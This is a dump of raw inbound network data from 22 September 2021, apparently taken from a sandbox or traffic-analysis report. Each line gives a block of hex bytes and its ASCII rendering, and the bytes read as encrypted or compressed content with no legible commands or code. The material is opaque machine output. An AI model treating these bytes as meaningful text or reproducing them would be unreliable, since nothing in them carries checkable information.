57 1b ee 7f a4 9f 64 47 60 33 0d 4a 5c 51 9d 23 6f e1 e6 fc 61 98 0f f0 0a 31 a1 99 a5 19 42
                                        Data Ascii: FJjo~I(M[VS|^vq[nU]Lp6!jYRP-H[T2-)KZ&;iC|9g\m?fh'z?B))j]x3Fuc@r^^r@S-G}f!]Q~1`5Ob?rKWdG`3J\Q#oa1B
                                        2021-09-22 19:00:55 UTC1275INData Raw: 13 24 84 4c 5d e3 0d a3 fa 2e 44 84 6c 22 ce 53 9a 06 4f 94 d9 b6 c6 71 ad 8d 46 63 8a ca ec 90 e4 87 ab 71 fb 26 92 2e 7c e7 51 e9 54 db 5d 10 f3 2a 55 93 db 92 11 34 04 8b c8 4d 4c 30 2c eb 6d 8c 90 7c e5 c8 fd 78 ac 9b 65 63 df fe 31 f5 aa ec 2d 49 38 12 7b 6f 83 c9 32 b2 f9 35 75 d9 ab 11 da f6 f6 17 9a dd 51 d8 ee f2 f6 9b 5d 7d 80 d3 2d 1c b4 8a c5 66 e9 39 6f 9b 11 77 1d 6a ce 49 1a 0c 95 78 ab 4d 28 05 35 96 ac db f3 ed c6 d1 c0 a8 e7 05 46 b0 ab 2d a8 f3 e3 e9 10 68 a0 13 ac 3a b4 a8 d4 5a 82 33 ab b7 47 a0 bc e7 3d 4e 20 3f 80 89 53 f2 be 52 5e b5 ee 58 8e bf 90 e8 3c 28 f3 5e 5a b5 42 96 89 65 63 f8 3e f6 a5 4c 3c 70 bf 7c 69 37 d1 4a 41 87 22 6d c0 4a 1e 9a 7c 99 7d 08 fe 10 00 56 86 03 39 11 5d 37 33 c9 e6 bd 67 9f 60 d7 05 b0 10 ee 74 c7 dd
                                        Data Ascii: $L].Dl"SOqFcq&.|QT]*U4ML0,m|xec1-I8{o25uQ]}-f9owjIxM(5F-h:Z3G=N ?SR^X<(^ZBec>L<p|i7JA"mJ|}V9]73g`t
                                        2021-09-22 19:00:55 UTC1291INData Raw: 15 4a 4c 21 0b a5 86 88 fe a7 60 74 dc 98 5b b4 ba ac 44 9a 97 ff 77 67 78 ee 64 64 c7 b5 50 18 70 b8 68 31 b9 c3 e6 6b f9 aa 47 1e fb 6e e8 5c 73 6e 15 16 25 1b 8b 55 8f 8b 60 02 ef 69 86 05 3d 26 32 c1 ea fe 32 f7 69 0d 40 15 b4 ae bc d8 90 06 20 bb 8a 83 f1 dc 5d 58 be e2 ea ab 85 50 a0 db 8c 83 90 59 78 1a 36 ec fe f4 c0 99 66 a8 fd 26 ce e2 da 02 10 95 2c 26 22 44 6d 76 21 e6 64 51 ee 3d 79 48 1c ce d0 d1 48 b1 f8 9e e1 49 e5 3b 79 ae ba 35 76 88 ca 72 89 6c 6f 3b 98 ac 55 4c d8 12 25 b3 74 88 46 b8 f9 71 ed 00 82 9c 41 8b 62 d2 91 6d 84 47 e7 0a 29 fc f8 a5 5a aa ac d9 76 c5 ba 3f dc 38 fe a2 f5 b9 b1 5b 8e 1e da 08 6f dc 32 3f b8 e5 49 7d 12 d5 dd 63 90 7f bc 70 ed 58 5d 9c a9 4b da be c1 73 50 71 c0 be 5c 9c 88 86 05 0f f2 24 dc ad ec 7d fe 4d 36
                                        Data Ascii: JL!`t[DwgxddPph1kGn\sn%U`i=&22i@ ]XPYx6f&,&"Dmv!dQ=yHHI;y5vrlo;UL%tFqAbmG)Zv?8[o2?I}cpX]KsPq\$}M6
                                        2021-09-22 19:00:56 UTC1307INData Raw: 9b 91 62 34 8d 5f 48 32 31 8f c8 ed 5e b9 3e d2 21 76 7e 80 11 09 7e 15 bf 3f 60 91 a9 70 f1 78 de b2 8b 95 b6 da 42 fd 7e 55 1a 0c 18 47 24 46 58 a3 81 4c 70 7c 5b 70 3a 44 88 78 84 c6 e5 c9 a8 28 57 9b 54 9e 01 00 16 3a 1c 3f 6f 87 2f 3c 5a 4f 62 57 b3 2b a8 c0 c0 9c 09 58 ba 74 2e dc 35 87 cf 7a 07 ad b0 22 bd 84 3d 44 6a 43 5e 36 b1 53 7e 60 01 44 12 c5 3b 42 ca b0 ab 7b 50 20 07 5e 39 f6 50 e1 fd d2 56 21 e9 ad c2 65 28 55 c4 56 c2 c0 be 2d 7a 7f aa 55 93 fd 1a 81 b7 57 76 c0 75 45 5d 0a f1 c0 b1 40 da ff 6f 10 56 83 81 46 5a 7a 61 c5 af 15 4f a2 80 b2 d0 c4 57 aa 38 ad ba 1b d8 ef 09 11 d1 5a f7 e6 90 95 93 51 31 4b bd ad e0 a8 d1 26 cb 82 31 b3 a4 68 dc cc 52 a6 48 de 88 7f 97 5f 15 e1 b3 80 b4 84 1b 82 df 13 96 7d 59 f6 1f e3 cd d4 06 12 e8 fb fa
                                        Data Ascii: b4_H21^>!v~~?`pxB~UG$FXLp|[p:Dx(WT:?o/<ZObW+Xt.5z"=DjC^6S~`D;B{P ^9PV!e(UV-zUWvuE]@oVFZzaOW8ZQ1K&1hRH_}Y
                                        2021-09-22 19:00:56 UTC1323INData Raw: ab 37 b9 08 59 ab 72 86 09 30 8a a7 0e 85 ea a0 ef 09 74 a2 32 75 b8 fc c1 c9 79 b3 1d c5 53 6d 38 31 e6 e5 44 4f bd f5 98 d8 31 ad df 23 55 b0 d5 06 9f ff 21 07 dd a9 13 e8 20 0f 4f c3 0d cf 7d 9a 6b 22 ec cb 47 6d 6c 8f b6 ff be a4 09 39 2b 7e 24 f7 f2 d9 35 c3 36 e4 e6 50 65 b4 d8 e4 7a 48 e3 77 a5 14 76 e4 8f a7 18 10 08 a6 84 10 1c c9 70 67 db 23 fb 20 ae 28 c2 26 83 b2 9f 8f 8e 8f 8f 65 d5 64 a8 d8 65 ca 4e 7e de 36 53 70 03 b0 a2 3f 56 b4 6e ef 60 9b 84 61 15 e2 0f 39 a1 fe 6b eb a2 2c 4f a6 be b7 b7 8f e6 8e 6f 53 58 8c 6c 27 76 35 a7 a9 62 ff 2b e4 8c 49 f3 13 a4 a0 0a 07 41 ee 3f 43 92 8b 27 3e 94 98 48 2a 39 4f fd 84 4a 35 29 e8 3b 4a 66 28 74 01 5a 16 15 45 b6 e2 61 b0 23 92 bb 47 1b 66 30 e7 a4 46 aa 6d 8f 0b 9c cb b1 21 0e 82 fa fd eb 7c a1
                                        Data Ascii: 7Yr0t2uySm81DO1#U! O}k"Gml9+~$56PezHwvpg# (&edeN~6Sp?Vn`a9k,OoSXl'v5b+IA?C'>H*9OJ5);Jf(tZEa#Gf0Fm!|
                                        2021-09-22 19:00:56 UTC1339INData Raw: 31 9d 19 7d 80 d9 b2 05 db be a8 25 ba 6b da f7 4c 57 f8 f3 fe ea e7 2e 6f 9d 7f ea 8c 5a a2 e3 73 37 80 6b 65 e7 b6 20 25 ef d5 be d1 85 b3 6a 64 68 30 de 4d b7 30 16 c9 b6 c3 e4 2f 64 d2 1b db 92 9d d6 04 d5 67 75 c2 3b c0 8f 5d e7 92 b4 4a b3 19 9e c4 47 61 ee 69 77 4b f4 94 b9 30 76 43 d2 82 6a 8e ca 10 4f 7c 23 e3 07 06 0b 54 e6 f3 48 38 db e4 b9 4e d1 32 ef aa 31 be 3b 7e 71 33 63 c5 5f 9f 6f 8a 0a fd 31 11 38 4e f8 08 b5 a0 a8 88 51 ab 7a 86 76 f1 f1 a6 5c f1 86 bf ab a7 75 83 3d fc 27 25 4a 5a e8 8f 0e 56 d5 89 fe 21 78 bb fc 4e 8e b3 85 f1 f9 29 92 16 a6 10 19 98 bc 2a ed 9c 04 17 8b 91 20 fb fd f4 84 e7 3c 3f b7 59 ec 72 4f 8e 6e 5c e5 fc a8 bb 31 c6 90 cf e1 14 99 bc 45 46 f0 0e 65 61 43 cb e5 b9 17 55 32 d8 a3 ba 90 06 30 5a 16 08 08 fe fe c2
                                        Data Ascii: 1}%kLW.oZs7ke %jdh0M0/dgu;]JGaiwK0vCjO|#TH8N21;~q3c_o18NQzv\u='%JZV!xN)* <?YrOn\1EFeaCU20Z
                                        2021-09-22 19:00:56 UTC1355INData Raw: 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e 3a 5c 8d 85 61 3c 43 f7 69 27 ad ca 9c 2f b0 51 03 45 f5 6a b9 e2 b8 6b 24 12 fc e6 db 3e 55 1c 1f 98 08 f5 74 cd 18 0a f7 7e e5 57 11 65 39 ce 83 66 ad dc bb ee d6 a0 3e 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e
                                        Data Ascii: Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.:\a<Ci'/QEjk$>Ut~We9f>Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.
                                        2021-09-22 19:00:56 UTC1371INData Raw: c9 48 d6 e1 80 db 95 a1 14 08 5a 73 f0 18 bf 4d 43 52 38 e0 02 76 6b 0f ca a6 80 c4 c6 9d 1c 18 be bb 52 44 de 08 5b 81 d0 e8 73 33 06 b1 6b 5f a6 64 13 28 9e 61 9a 13 c0 61 9a 20 ac b4 e0 5e 24 c4 c5 2c 89 b1 6b fb cd b5 62 14 42 ca 30 9a 99 04 61 b1 6b b3 6f c0 cb 71 fe 88 41 b4 e1 6d 86 ba de f2 58 ae f4 d2 22 34 f9 49 57 10 4b e5 fc f2 58 67 88 12 40 19 30 54 31 d3 aa 27 13 19 30 64 1c 55 bf a5 0e be d8 eb e7 00 66 ea 79 18 b2 6c 0d 74 7b 58 26 23 2a d7 93 69 83 9a 96 e7 fe 16 b6 b5 6d da 1a e8 7c 02 62 7e 55 d9 9f 1b 3d 75 f9 f3 d4 07 e9 d8 11 e5 f2 6c 0d e4 77 d7 93 11 c0 0f c5 86 41 aa f6 99 2b c5 4b bb 5d 26 96 2f 03 65 99 b7 6a 93 24 01 e7 52 36 55 bc 63 9d 59 a7 44 d1 f6 5c 7f d0 4b 46 ba d3 d4 2a 96 a2 82 5e 3e e2 2f 03 d0 22 60 15 14 4f a3 00
                                        Data Ascii: HZsMCR8vkRD[s3k_d(aa ^$,kbB0akoqAmX"4IWKXg@0T1'0dUfylt{X&#*im|b~U=ulwA+K]&/ej$R6UcYD\KF*^>/"`O
                                        2021-09-22 19:00:56 UTC1387INData Raw: 10 73 cb ee 24 f1 b2 97 7d 8f 61 e5 c4 fc 76 51 c1 10 1f 7a 1c f9 9c d6 4a b7 3b 3e be a8 be ee 57 f7 99 7f 97 7b b5 17 67 d5 d3 da 2c b0 d0 57 eb bf 18 c8 60 4f 1d 62 4b 1c ce 65 c9 c1 75 cf 94 93 63 c7 f0 2e f1 aa b0 b1 1e e5 a1 68 33 3f 59 92 cf fb 92 e0 70 21 74 2c d3 f3 ae b8 84 37 48 ed d5 a1 6e 25 4d 19 48 88 15 94 d5 c4 90 ff 98 f4 29 5d fe 3d 55 89 fb f4 25 45 0a 01 bc 8b b7 3a a2 c4 98 f4 29 5d fe 3d 55 89 fb f4 17 71 a3 46 8c e5 85 91 63 da 7c 2a ce 56 0b e8 4a b0 bf 17 6c 72 39 39 38 b8 80 13 aa b7 3a 89 fb f4 64 4f 10 12 14 14 37 2c d1 fd 8a 15 a9 35 26 e4 41 5e 1d 0f b1 2a ee 2e c6 61 d1 fa 18 c8 60 40 b4 95 15 fd f8 2c de 4d 08 02 26 d7 d6 4f 7c 5e 1d 0f b1 3c b6 b1 20 e1 c8 68 33 3f 59 e0 58 78 15 98 ff 95 42 8f 5c 7d 95 6c 79 b1 26 cf e1
                                        Data Ascii: s$}avQzJ;>W{g,W`ObKeuc.h3?Yp!t,7Hn%MH)]=U%E:)]=UqFc|*VJlr998:dO7,5&A^*.a`@,M&O|^< h3?YXxB\}ly&
                                        2021-09-22 19:00:56 UTC1403INData Raw: 82 3b 58 34 85 7f 1a 73 b7 b9 8c d6 73 c7 a6 fe f1 8e 92 aa 87 7b dc 30 b9 47 03 86 70 60 65 21 e7 33 42 c8 ec 03 f8 49 2b a0 f8 4b 57 ca 80 98 60 5a a3 dc 66 2e f0 ae e4 29 0b cc 49 e6 b9 9f 50 38 22 cc 0d a8 4c ee 3f a9 ca f6 92 f5 2c 58 10 37 ba ee 3f 47 4f 38 43 78 96 14 6e bf 6d 9a e4 86 12 6f e6 12 fe a8 8d 6b ae e8 0e a8 ad 6d ea c6 16 d0 9b 37 b7 4e de 70 83 88 74 69 e1 32 a3 64 a7 54 0b cc 49 a9 65 a8 35 43 62 26 0a e1 b4 d9 8d 3f da 08 65 25 df 4c 8b b7 b7 08 61 c9 86 74 4c d5 c9 86 74 5d 9b 4a b1 38 11 c6 f8 e6 ac 4c 09 1c 73 1b cf 15 a8 e9 9a f3 e2 7d 6c 3b 58 d2 47 8e 0d b7 01 8d c5 f5 18 7f 98 81 01 81 b9 9c e1 30 ef 89 f7 ae 47 3b a4 f3 6f 3d ae b1 ff 14 2d cd e5 df c3 79 d0 6b 39 bc 61 5c e3 c4 79 30 eb d1 f2 60 4b 23 e0 7c d5 f1 26 e6 cd
                                        Data Ascii: ;X4ss{0Gp`e!3BI+KW`Zf.)IP8"L?,X7?GO8Cxnmokm7Npti2dTIe5Cb&?e%LatLt]J8Ls}l;XG0G;o=-yk9a\y0`K#|&
                                        2021-09-22 19:00:56 UTC1419INData Raw: 33 0f a7 b7 af 0b 65 a7 d7 5a ef 42 cd 67 80 30 33 cf d1 15 21 55 02 ab ba 3f 56 e3 79 53 59 c7 0f ea 3b a6 3f 3f 39 3b db c8 df 84 72 a2 d1 c6 8a 78 22 5a 90 75 34 4a 3c 3b 50 ba 60 69 a0 26 65 27 3d be 35 70 40 af b8 64 d5 5a 97 3b b8 e1 bb 68 23 a6 73 f8 8d 46 65 af 4e 79 d0 53 0e 68 46 33 bb 67 b0 53 79 9d ad 4f 09 38 4e f0 28 67 34 01 e1 44 1b f4 9d 26 64 d6 66 a5 33 d4 1e 21 18 84 70 54 07 18 8c c4 77 da 59 49 eb d1 98 9b 32 bd ab b9 21 93 0b 9d e6 c2 eb 83 11 e5 4f 30 ff 77 f5 93 11 b9 1b 88 4e 11 f4 d4 1d 86 7c 0b 63 98 db 25 d4 5a 9f 20 e0 e2 b9 66 a7 c0 a6 31 0f b0 5b 62 63 23 02 21 c3 fd fc 09 1c cd f0 df 9f 5f 9f df ca 8a 18 6f 02 67 4f 83 11 0b e8 8d ff b9 ef d9 a9 41 5b 96 50 f6 2c 3b 46 9d d9 52 9e bb 80 67 f4 d6 5f 25 10 34 4a 05 9e 20 6a
                                        Data Ascii: 3eZBg03!U?VySY;??9;rx"Zu4J<;P`i&e'=5p@dZ;h#sFeNyShF3gSyO8N(g4D&df3!pTwYI2!O0wN|c%Z f1[bc#!_ogOA[P,;FRg_%4J j
                                        2021-09-22 19:00:56 UTC1435INData Raw: e5 4f bf 8e 7a 85 c9 6e 81 62 21 6c f2 e5 88 31 b0 d4 5d 12 b7 d4 dc 6b e7 97 44 39 39 03 90 8e 6d 41 a2 6e e5 2c fc 35 c8 d2 91 08 24 17 c2 c4 ed a0 45 5d 64 d6 c3 a5 d0 5a 57 05 0d 67 46 db e9 ea 33 c0 76 1e 99 66 a5 16 f4 a4 33 73 88 f2 b8 6a dd 39 19 51 d6 70 44 a4 3b 93 4a af 11 a8 de 67 4f 18 c7 09 30 33 37 3c d3 fe 01 51 e6 af 3b 1f 56 f4 9f e7 b3 be 11 0a db c8 fb 08 80 43 8a 31 78 dd 67 3b bd 5f d8 3d 29 d6 a6 f5 ef a1 a4 94 e7 08 e4 0d af c5 46 97 19 5a 6f 41 5f c7 c1 b3 8e 0d b9 33 69 e6 85 a9 be 12 bb 8a 95 d5 92 5c 2b e6 cd 55 02 07 1c d3 63 53 49 ad a1 d0 f9 51 e6 80 ec 13 af c6 0e 1a c8 52 39 bc 61 f5 24 c3 20 ce 4f 8c 6a c8 ff 2e 93 f8 ae 33 c4 24 6b 51 7c 1b 86 74 09 92 89 93 01 5b f2 39 15 a7 fc 45 99 e5 16 fa 99 e1 47 3b 7f 0d ec 12 59
                                        Data Ascii: Oznb!l1]kD99mAn,5$E]dZWgF3vf3sj9QpD;JgO037<Q;VC1xg;_=)FZoA_3i\+UcSIQR9a$ Oj.3$kQ|t[9EG;Y
                                        2021-09-22 19:00:56 UTC1451INData Raw: e2 d5 73 f8 ae cc 0d ec 52 eb d4 6b a9 41 5e 1d 81 69 43 6c 4e fa 71 c6 00 dc 88 fa 17 02 54 07 53 0d 13 9f e8 4a f1 de b8 61 5c 7e 63 e8 c7 41 03 33 b4 82 89 10 8c 7d f0 da c5 bd 6c 3b 72 b1 ba e6 03 ed e5 65 53 d0 9c a9 35 43 62 63 93 21 25 a3 34 85 c3 d1 f0 4c 7f 81 b0 89 a1 ef ea b0 2d 99 c9 6e bf 71 c6 07 65 ac c7 82 e3 3c 58 ef 24 35 a4 5e e2 3d 55 9e 13 f9 ef d9 29 aa 48 12 8a d0 a5 d0 16 80 67 38 49 e4 91 87 09 1f 2d b6 35 4e 90 75 32 13 52 eb d1 98 9b 2a 11 f5 e7 c8 84 f3 69 91 e7 37 b5 f6 b0 38 ca 09 e3 37 cb 00 80 ec ac 3b 6e 52 eb 81 16 7f 1a 87 73 46 17 ff 51 72 a1 2f 36 c5 fe f9 64 fa fa 8e 7a 64 01 3a 9e 56 f4 9b 69 30 35 77 a7 fc f3 1d f3 a6 81 01 fb 9e a9 2b 7d 1e 6e be 81 6c b6 dd d8 27 25 21 4c 09 1c 73 a4 33 f8 92 73 65 87 1e 91 0c 6a
                                        Data Ascii: sRkA^iClNqTSJa\~cA3}l;reS5Cbc!%4L-nqe<X$5^=U)Hg8I-5Nu2R*i787;nRsFQr/6dzd:Vi05w+}nl'%!Ls3sej
                                        2021-09-22 19:00:56 UTC1467INData Raw: 4d be 65 7c d5 a1 2f 35 ca e1 7d 6a 27 50 fe 7a 5a 15 58 ae 4c ef ac c5 42 e4 35 41 a5 b8 e1 bb 6a 18 1a 00 50 fe 78 79 5e 97 e6 b9 47 69 5d 5d 10 74 38 da 30 fe 8c 81 e9 cf ab ad 8f 83 ef 6b b0 a5 38 ca 09 e1 8b 41 de 26 d6 22 61 23 71 b2 d4 1f 11 da b2 ee a7 b7 85 79 8e d5 a1 6f 4f bf 2a aa 73 08 3a 0e 5d 9f 5e dd 37 b7 a1 14 5c f0 5c 18 86 34 42 6b b6 a9 81 6d 41 a1 d0 f8 85 31 b0 08 ea 1c 4d f3 21 19 32 e3 ff 76 92 86 25 df bf fa 71 c6 02 14 fb 7f 75 0c 6a 37 4a c9 06 d6 b3 95 4e a4 e9 91 56 2f 32 36 1b 7e 28 e1 bf 9a 84 74 c4 fc 76 68 bc 02 54 42 6b 6f 49 60 54 03 ae f7 eb d1 a1 b1 ba e6 03 5d 4d f3 14 48 ae e9 b0 0b 6d f5 3f d2 1a 88 40 1d e7 c8 41 d5 71 39 4c 7d e1 fe 5f 77 72 49 05 db c4 ac c7 c1 85 d6 9b 72 11 b5 d0 16 c5 f5 ef 8b 00 40 50 a6 fa
                                        Data Ascii: Me|/5}j'PzZXLB5AjPxy^Gi]]t80k8A&"a#qyoO*s:]^7\\4BkmA1M!2v%quj7JNV/26~(tvhTBkoI`T]MHm?@Aq9L}_wrIr@P
                                        2021-09-22 19:00:56 UTC1483INData Raw: 41 5e 1d 0f b3 a7 6c 3b 13 28 9b dd b2 d6 2b 2d 71 66 ea 2a c7 eb 97 69 d9 cc 45 6e 40 f1 5e 1d 0f f0 dc 30 b8 e1 bb 68 33 3e 28 a7 3e eb 2e b4 db 92 8e c6 10 e7 bc 82 0c 03 b3 1e 97 19 03 56 0b e8 4a 71 c6 00 50 fe 39 ae c0 f3 a0 7d 89 04 58 10 3f 59 d2 0a 59 f7 87 8f 7c 0d 81 9b 4d 3e de 34 e8 4a f1 de 34 41 5e 1d 0f f0 1f e2 6d be ad b8 61 5c 18 86 5b 96 d4 ba 7e 17 6c 54 41 5a 14 53 05 db ae cc 8d 03 d6 23 1c cf 4d 04 58 52 da 40 24 9e a9 29 29 68 f4 f4 10 1d 60 67 c4 92 eb a3 55 d9 a3 34 e6 46 e8 4a f1 5e 1d 0f f0 5c 18 84 71 c6 42 39 e8 b5 5b 96 ce 11 b5 4b 73 af 2b 41 3c b2 ba a3 33 3f 7f e5 c4 fc 77 53 85 f2 60 21 5a ec 03 28 a7 3c b7 a1 2f 36 95 15 bd 7c 5e 78 32 d2 57 e9 ad 3b 14 73 cb ae cc 0d ec 53 05 db ae cc 0d ec 53 84 8e 86 74 2d cd 8f 08
                                        Data Ascii: A^l;(+-qf*iEn@^0h3>(>.VJqP9}X?YY|M>4J4A^ma\[~lTAZS#MXR@$))h`gU4FJ^\qB9[Ks+A<3?wS`!Z(</6|^x2W;sSSt-
                                        2021-09-22 19:00:56 UTC1499INData Raw: ef ad 81 17 42 94 5b 68 3f 1c 07 df b7 5f 70 ca 06 a2 34 9f 74 e8 ef 7c fb 0c e1 5f ea c2 a0 fb fc 33 b4 26 5e d1 1b e3 7f d6 f1 ed 1d 84 8f f7 8b 21 f0 48 ab ce 41 ba a3 b9 34 3e 28 c6 2f de 20 d3 17 02 54 07 73 46 e7 ca f6 ea 46 9c a4 b6 dd b2 48 56 8b ed a1 f4 e1 43 e9 33 c0 4a fa 99 0a 23 97 e9 47 b2 5f c8 52 50 1a 4c 75 23 97 4c 35 1e 74 c6 5b c8 5b 66 c5 81 15 2c 79 31 f8 92 72 83 91 e4 bd 29 a2 b1 11 84 15 95 05 52 67 e9 95 4f bc d9 59 79 27 d9 78 b0 39 8f f7 15 84 14 93 ed 90 01 d2 59 e3 f7 83 fe f3 86 2d 6b e3 7f d6 cd 64 d5 5d 49 6c d2 d9 56 f5 9c ad a1 d3 d9 22 48 de 34 82 1a a3 5c 08 e8 2e ed 8c db 6e 73 34 3e 28 dc b5 54 f3 af b1 aa 86 8b ef 8a 82 73 40 1d 84 8c d4 94 58 9b 72 ad 0c e7 38 8f 21 d8 24 5c 33 d7 f0 77 23 49 e4 0d af c5 92 cb a2
                                        Data Ascii: B[h?_p4t|_3&^!HA4>(/ TsFFHVC3J#G_RPLu#L5t[[f,y1r)RgOYy'x9Y-kd]IlV"H4\.ns4>(Ts@Xr8!$\3w#I
                                        2021-09-22 19:00:56 UTC1515INData Raw: 75 cf 95 95 93 9a f0 5c 5d a1 97 1c 3a c1 8a 80 25 b6 35 13 f9 ef d8 a7 ba 6d ee 57 cb b1 e8 4f cb 84 80 36 3a c6 8b 39 c7 72 c2 a1 ec 08 3f a9 10 8c 89 70 82 e0 ea c4 f5 92 4e 7e 9c 5b 7c 62 ce 19 45 ed 06 d6 d3 17 d8 ac 91 5f 5f 14 b8 ba b8 be 1e c0 0c 62 ad 8e 0d 3f d2 13 8c 41 da d3 63 42 bf 99 16 c3 f2 b3 dd bc 9f 29 d7 26 c5 78 22 9b dc b3 30 bc 99 95 73 33 b4 03 5d cc 5b c5 bd 37 16 70 15 02 5c 93 d7 2e 67 3b 59 e7 08 e5 3b af a4 26 4b 7b 9f a0 7e e8 ba 6d 64 a1 79 8b 6f 01 8f 51 db f0 ac 96 68 3b db 6d 35 bf 24 15 f7 9e 69 31 62 d9 56 f5 5a fc b5 d0 43 6f b7 5f 9f da 2c 8d 03 d6 dc c0 d6 27 65 27 d9 ec d8 0e 1b cb 0e 91 f3 5a e3 57 48 66 2e b4 69 a2 0b 21 2b 7d 1d 4a 7a 4c 82 9d a3 c4 77 d3 9c 35 18 6c f8 e6 65 d8 63 f0 67 b0 5b 96 d2 3c 8b 5e 32
                                        Data Ascii: u\]:%5mWO6:9r?pN~[|bE__b?AcB)&x"0s3][7p\.g;Y;&K{~mdyoQh;m5$i1bVZCo_,'e'ZWHf.i!+}JzLw5lecg[<^2
                                        2021-09-22 19:00:56 UTC1531INData Raw: bd e7 1b 80 af c5 7e 63 67 9a 48 e9 8a f6 0f a0 a7 7a e5 cb db a6 fc c9 89 d9 dc 20 c4 bb 9e 51 0b 1a 03 0f 7b 8b a9 12 b7 d4 1f 1b c9 db f7 b0 d0 16 80 87 65 53 85 f2 60 c5 fd 73 1b 80 ad c2 2f bd 3d 5d d6 a8 ef d5 ec d8 76 ae 81 63 b6 a9 41 5e 1d 0f 12 cf 17 64 d5 ec db fd a9 ad c2 a2 72 12 29 73 92 71 3b 1c e0 d1 67 64 94 f5 24 15 f5 a9 fe 75 1f 98 9b 22 55 13 11 f1 98 10 15 ad 43 24 21 17 1d e4 be 13 b5 d5 49 90 5e a3 52 c0 78 52 27 69 3e 07 54 07 df 78 ed 3d 51 c6 8b 99 4e fe 5e 59 19 f9 10 84 e5 2c 73 40 0f 7b f6 17 02 54 87 f6 25 5b 17 0b 97 19 06 dd b2 9c df 36 9e dc 20 c4 bf 87 06 0c 95 1d 84 b3 dd 64 a1 f7 60 d3 17 fa b5 d8 71 95 15 f9 2d 6f 9b 79 d8 27 25 f8 fe 85 f2 60 21 c4 7f 6e bf 3c 59 42 6b 61 28 f5 ef 8c 0a 34 d9 dd b2 d4 1f 13 23 a4 35
                                        Data Ascii: ~cgHz Q{eS`s/=]vcA^dr)sq;gd$u"UC$!I^RxR'i>Tx=QN^Y,s@{T%[6 d`q-oy'%`!n<YBka(4#5
                                        2021-09-22 19:00:56 UTC1547INData Raw: 58 d8 a4 b5 b0 d8 6d 37 81 da d3 54 84 7a 2f 04 63 b9 8f 09 f7 a9 87 36 f6 61 d6 2b 5f a4 65 27 2d 45 ef da 58 d0 93 ee aa 01 bd 84 20 65 e9 41 52 74 b2 c4 8b 00 af b3 97 9f c3 2f 66 de 71 4b 53 f0 5c 10 0c e9 8a 96 57 bd 68 46 ec 24 a5 c3 f2 68 46 63 a4 eb 5a 43 34 92 7e a7 bf 9d ad 1c 8d 43 ef 1a 48 66 ed d5 a1 2f 32 05 db ee da 2c b4 1b 56 cb b8 0d 67 e5 54 c4 a2 4e 07 53 06 b5 a4 6c 85 94 ab 03 5d 4d f3 12 fc 20 05 18 da d3 61 2f a1 c7 7d 3a 70 22 a2 f7 60 f7 60 d1 13 af 8e 0d 2f 6d e0 66 3e 13 7a a5 c5 bc 3b b8 b1 16 c3 f4 32 63 5f cf 4c 01 dd c6 c0 76 55 fc 80 e2 fd cb 89 10 8c 7e 9c 20 7d 73 0a ee 9f 00 5c 3c 9f a0 7d ca 1b 75 c3 5d df 8c 87 8a bf 4a f5 c3 2d b9 74 0e e5 32 8e 84 9b d2 91 f3 1d f0 f7 03 44 25 ab 8d 28 af 6a 7b 57 5e 36 d1 e6 4e de
                                        Data Ascii: Xm7Tz/c6a+_e'-EX eARt/fqKS\WhF$hFcZC4~CHf/2,VgTNSl]M a/}:p"``/mf>z;2c_LvU~ }s\<}u]J-t2D%(j{W^6N
                                        2021-09-22 19:00:56 UTC1563INData Raw: cf d6 4c de 34 84 67 50 fe 38 a5 08 61 e6 51 68 33 7d 8e be ee 12 60 d1 98 d9 c6 40 db eb c6 f8 6d fc 19 4e fa 34 d9 a9 41 1c e2 6d be ab 5d 93 11 b7 30 e0 39 09 fb e4 41 1c e2 5d 9b 67 a8 a6 ba a4 d9 c1 75 8a 65 8c 81 ab 2a db ae 89 e3 97 19 44 8b 87 f6 2c a8 8e 86 36 aa 43 62 63 b0 e8 4a b3 39 c4 fc 33 27 65 ac 85 9d b6 dd f7 f3 aa c3 3b 3f c1 75 8a 65 fc 76 13 96 37 48 a8 a6 e2 3d 17 6d 16 80 22 82 0b e8 08 0e de 34 84 68 5b 96 d5 ce a9 41 1b 13 89 fb b6 b2 14 7b 99 06 25 20 d7 ca c1 75 8a 65 2c b0 92 e1 6b b9 21 00 d8 27 67 df 6f c2 b2 cc 9d 26 e1 d4 ff fc 33 27 bd 6c 79 b7 b7 5f da 34 61 a3 76 3e 27 25 65 b4 71 c6 42 8f f0 5c 5d 83 5e 1d 4d 08 61 a3 71 de 8c 81 ab 35 4b 73 8e 9e 69 b5 19 76 41 5e 58 08 a9 41 1c fd e0 39 09 fb 24 9e eb a1 0f f0 19 1e
                                        Data Ascii: L4gP8aQh3}`@mN4Am]09A]gue*D,6CbcJ93'e;?uev7H=m"4h[A{% ue,k!'go&3'ly_4av>'%eqB\]^Maq5KsivA^XA9$
